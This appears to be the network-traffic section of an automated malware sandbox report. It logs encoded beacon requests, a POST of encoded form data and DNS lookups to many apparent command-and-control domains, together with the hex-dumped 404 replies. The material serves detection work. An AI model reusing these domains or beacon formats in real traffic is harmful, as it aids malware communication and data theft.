                Source: global trafficHTTP traffic detected: GET /4qxi/?OvV=2njD6f80EDOLQ8&wz4=2e2Lyydb5YXufeuqFd6wHPkWuEpHgF+t8X6R7x/Chu/ldxqUFwOFXImYee7E7KlqqCMuAjd7uJeZN9yFXwONOjr0nxS6++UxPbCo/R3/4PV751NgF4k6l5M= HTTP/1.1Host: www.thesquare.worldAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /p75v/?OvV=2njD6f80EDOLQ8&wz4=GLmvlUrKOeNEevY3wcyfjSkNrwRDbMR2/x32zMvR34mmT0X9ObY05SVA9W4yUMrr2Yq11ERvKU6w2wYb4X7EbFt4LfTn3Wu5NGMirqATx7GUx0yxlSOAJso= HTTP/1.1Host: www.wddb97.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ro4w/?wz4=c7bs7cBJE/6WeNDz6y7wfs4csA5ai8mWfunIFb5NDUjHoY3en1z9O1W0OakyKWwaCum+/W1z6qbtx3tl+iJ0V9nyUJg4fcAQQsDkMDUAlXZwvkRINEDVO9c=&OvV=2njD6f80EDOLQ8 HTTP/1.1Host: www.nexula.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /rpjd/?wz4=yOJpbVbkgz0HtUwQYARMSThcLcopmrPoDVX6GqNwoWWXZF3pcIj1Y13LV6gW4nMVJ2J858d+IDhJ+laaNqfHK1c6MutgW040XFAhxno1AdPNbACR1ywEbhk=&OvV=2njD6f80EDOLQ8 HTTP/1.1Host: www.prediksipreman.fyiAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /qjug/?wz4=VcMkcuIRceq81+g9yOCv0sbld0olDHkRvlNhYh95NOpnwjcC/r1DFPFDhAQ/BZSpNAD5Fbv04pxr6m2h9PMUHq+9H+1HT0zuQhfUSGVBQeWRfQVA8fdlyIU=&OvV=2njD6f80EDOLQ8 HTTP/1.1Host: www.scottconsults.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /dim8/?wz4=SI5ZCVgJbtC8ikIAaDbl0c4+a+swA4Oej6uVn92gSwZctgLMHnh4qXUXZe4N7Wh4DCFNfNClZUM8FDTYBsBE5loeshCr6I6FGtX7Gz1ZeQkIvaXZY4DJTLc=&OvV=2njD6f80EDOLQ8 HTTP/1.1Host: www.2q33e.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /yysf/?OvV=2njD6f80EDOLQ8&wz4=587F8uRRvdNyXp392stmA/LSb7Spi8c8LmJfnRupxm2/Wn33qNRES9K4qtAStdZkGkX6B9loQ5/VkD04mezEqEUp6fJ/QFk+OhJrfgesanG1zCyT/BctW7c= HTTP/1.1Host: www.7wkto5nk230724z.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /otgv/?wz4=mPj2soEUEFmq5Xu56Ev9ENs/GIe87AemMTFSPosGtz7M/tXNad3AOcc3teRO2drll+qYOuNJorQ/HJUWSqoYkO/lFhsMOlB8p4kTaBK5nEPe9NarMUavWdI=&OvV=2njD6f80EDOLQ8 HTTP/1.1Host: www.livingslab.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/LgqczUnn1NrDdL/bN6nwlekL5Do//GTuaTPhPlYdtLOoB+gLN1EC4FlrA=&OvV=2njD6f80EDOLQ8 HTTP/1.1Host: www.quickcommerce.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /8vp1/?wz4=/LTgXn1km3iwlVyiegwnGjWZZFB0eLisfcmkyyqxOnWJ8H9CeAgPjsH/KIvj3CyMdhcMqJeWq/63o3TMWNYzsf+ek40CYofT8u9WJYZhwl3Hq5liXp4GPpE=&OvV=2njD6f80EDOLQ8 HTTP/1.1Host: www.xpremio.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.thesquare.world
                Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: www.revolutionmusic.net
                Source: global trafficDNS traffic detected: DNS query: www.wddb97.top
                Source: global trafficDNS traffic detected: DNS query: www.nexula.website
                Source: global trafficDNS traffic detected: DNS query: www.prediksipreman.fyi
                Source: global trafficDNS traffic detected: DNS query: www.scottconsults.top
                Source: global trafficDNS traffic detected: DNS query: www.xtelify.tech
                Source: global trafficDNS traffic detected: DNS query: www.2q33e.top
                Source: global trafficDNS traffic detected: DNS query: www.7wkto5nk230724z.click
                Source: global trafficDNS traffic detected: DNS query: www.livingslab.net
                Source: global trafficDNS traffic detected: DNS query: www.quickcommerce.cloud
                Source: global trafficDNS traffic detected: DNS query: www.cybermisha.store
                Source: global trafficDNS traffic detected: DNS query: www.xpremio.online
                Source: unknownHTTP traffic detected: POST /p75v/ HTTP/1.1Host: www.wddb97.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.wddb97.topReferer: http://www.wddb97.top/p75v/Cache-Control: no-cacheConnection: closeContent-Length: 200Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like GeckoData Raw: 77 7a 34 3d 4c 4a 4f 50 6d 69 4b 66 54 65 49 42 4d 75 74 42 7a 76 7a 46 72 68 49 79 71 51 77 62 52 4f 74 6a 6b 7a 54 52 76 2b 50 44 34 49 43 4c 57 31 6e 35 4b 4c 78 48 37 68 34 66 31 56 64 51 52 62 62 2b 78 65 32 53 74 58 64 38 64 68 61 41 77 46 6f 56 2f 32 7a 6d 54 46 52 6f 48 38 61 58 6b 6b 65 37 4d 33 34 37 69 71 35 63 72 72 2b 54 31 58 79 44 6d 53 6d 79 64 73 35 58 66 41 70 79 6d 4b 4b 70 62 71 30 30 79 77 6b 49 73 6d 4a 48 45 6e 70 77 59 71 61 75 76 47 73 4c 50 52 31 74 59 71 73 37 66 4e 75 6d 41 61 35 74 50 39 79 2f 78 4c 6e 39 73 78 61 37 62 70 72 32 67 50 38 6e 2b 47 53 6c 46 67 3d 3d Data Ascii: wz4=LJOPmiKfTeIBMutBzvzFrhIyqQwbROtjkzTRv+PD4ICLW1n5KLxH7h4f1VdQRbb+xe2StXd8dhaAwFoV/2zmTFRoH8aXkke7M347iq5crr+T1XyDmSmyds5XfApymKKpbq00ywkIsmJHEnpwYqauvGsLPR1tYqs7fNumAa5tP9y/xLn9sxa7bpr2gP8n+GSlFg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:24:53 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:24:56 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:24:58 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:25:01 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:25:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:25:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:25:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:25:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 14 Jan 2025 09:25:20 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 07 d1 db 3d bb ba 21 09 90 90 04 02 84 c3 71 42 e8 8e ae e8 0e 1b 7e 20 bf 86 9f cc 25 ba 7b 9a 66 ba cf cc 3a fc c3 35 3f 1a d5 25 2b 2b f3 cb cc 9a cc fa ed b7 df 1e ff 89 5b b0 2b 53 e5 07 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 2d e7 db 6f 97 9f 89 5b 59 60 46 95 df bb c7 3a 6c 9e ee d8 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 15 a5 5b 3d d5 95 77 4f dd 7d 4a c7 b2 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 aa 85 e5 27 d6 3f b2 82 ef f2 b0 70 cb ab 25 c8 3b ea a9 95 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 56 7c 5f da 56 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 50 b2 6a 30 c9 ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 de 67 ce 69 f0 f7 cb d4 fe b3 6f 1e 90 ce bd 67 25 61 7c 7a 18 d0 05 d8 f6 cb 40 74 e3 c6 ad 42 db fa 32 28 ad b4 bc 2f dd 22 f4 fe f2 e3 b2 32 3c bb 0f 03 94 c8 bb f7 83 71 98 ba f7 81 1b fa 41 05 86 bf 12 18 45 8e 50 02 1b bf 9f b5 b7 ec c8 2f fa 33 00 15 c5 59 f1 30 f8 67 ef d2 de 4f 7b 1d c3 26 38 86 23 ef c7 72 cb 71 c2 d4 7f 18 dc f4 27 56 e1 87 e9 bb ee ff fc ce 7e e9 da 55 98 a5 5f c0 d1 b3 ca 2d 6e e4 e1 84 65 1e 5b 40 16 fb 38 b3 a3 ff 83 ed be f6 f8 b3 80 44 6e 77 7a 66 f2 3e 76 3d 20 25 ab ae b2 f7 9b bd 0c 17 cf 52 fc 71 fc ed ec 03 14 b9 d6 c0 db 49 bf 02 44 e6 59 5a ba f7 61 ea 65 37 07 7d 95 2b 7b 69 6f 7b 5f 2d 2f 2b ab aa 4b a0 1d c7 bd 59 7c 41 cd b3 fa 49 04 f9 97 3f 5a 5d b8 56 99 a5 9f af c7 c8 eb f5 3d 24 3f 53 c1 15 67 17 99 da d5 e5 5c 5f be 6b 16 9c b7 df eb be 77 14 37 1b be 9e 16 b9 b4 0f f9 ed b1 d4 03 03 18 de 07 e2 ba 42 6b e1 e6 ae 05 74 06 dc c8 f3 cf 37 72 3d fb 57 33 5f 77 c5 c6 38 4d d0 ef a7 bd 8e 4d 2e ed 6d ec ea 94 b7 1c 59 9f 1c ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 94 c2 f4 cd 94 c7 f8 27 40 bb d6 c7 0d f5 17 1c ef b3 aa ca 92 87 41 bf c7 db 61 7b 79 5d 61 09 1d 5e 0f 5e 49 e2 1d fd 5b 31 f4 ea be 77 5c 3b 2b ac 5e 7f 0f 03 e0 52 dc a2 77 42 ef 37 7a 95 38 f0 47 0c 7b a5 8d 4f f7 79 08 b2 c6 2d ae f0 f5 9e 8d 07 2f b3 eb f2 f3 61 0b f8 99 e6 d6 72 5e 99 c0 e8 21 31 1e be 31 78 c5 c4 e7 28 7e f5 6b 1f 29 ea 17 c4 58 c7 37 ba f9 6e 69 61 7a f1 d9 1f f8 bc 38 2c ab fb 4b 58 e9 01 9f ba 83 ac ae ca 10 38 84 fe e3 8d fd 5e 91 af dc dd 38 e3 ef f0 ba ea 7f 3b 2d e0 29 0e 6f d8 f2 e2 ac b7 af de 33 be df e1 a2 69 2b 0e 7d a0 64 1b dc 10 dc e2 6d fc 8d e4 d7 1b bb 79 01 fd 47 3b 5d 02 2e 88 51 9f f9 b0 de 11 dc 87 89 e5 df aa f1 fb a1 3e f5 bd 97 a5 fd 2d 07 04 a8 db f3 f5 31 b7 7d 89 8f fb 2c 76 de 4e d1 cb f1 fa 94 3f ca a0 cd 0a e7 7e 0f 30 12 81 18 d5 ff b9 b7 e2 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 14 Jan 2025 09:25:22 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 07 d1 db 3d bb ba 21 09 90 90 04 02 84 c3 71 42 e8 8e ae e8 0e 1b 7e 20 bf 86 9f cc 25 ba 7b 9a 66 ba cf cc 3a fc c3 35 3f 1a d5 25 2b 2b f3 cb cc 9a cc fa ed b7 df 1e ff 89 5b b0 2b 53 e5 07 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 2d e7 db 6f 97 9f 89 5b 59 60 46 95 df bb c7 3a 6c 9e ee d8 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 15 a5 5b 3d d5 95 77 4f dd 7d 4a c7 b2 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 aa 85 e5 27 d6 3f b2 82 ef f2 b0 70 cb ab 25 c8 3b ea a9 95 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 56 7c 5f da 56 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 50 b2 6a 30 c9 ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 de 67 ce 69 f0 f7 cb d4 fe b3 6f 1e 90 ce bd 67 25 61 7c 7a 18 d0 05 d8 f6 cb 40 74 e3 c6 ad 42 db fa 32 28 ad b4 bc 2f dd 22 f4 fe f2 e3 b2 32 3c bb 0f 03 94 c8 bb f7 83 71 98 ba f7 81 1b fa 41 05 86 bf 12 18 45 8e 50 02 1b bf 9f b5 b7 ec c8 2f fa 33 00 15 c5 59 f1 30 f8 67 ef d2 de 4f 7b 1d c3 26 38 86 23 ef c7 72 cb 71 c2 d4 7f 18 dc f4 27 56 e1 87 e9 bb ee ff fc ce 7e e9 da 55 98 a5 5f c0 d1 b3 ca 2d 6e e4 e1 84 65 1e 5b 40 16 fb 38 b3 a3 ff 83 ed be f6 f8 b3 80 44 6e 77 7a 66 f2 3e 76 3d 20 25 ab ae b2 f7 9b bd 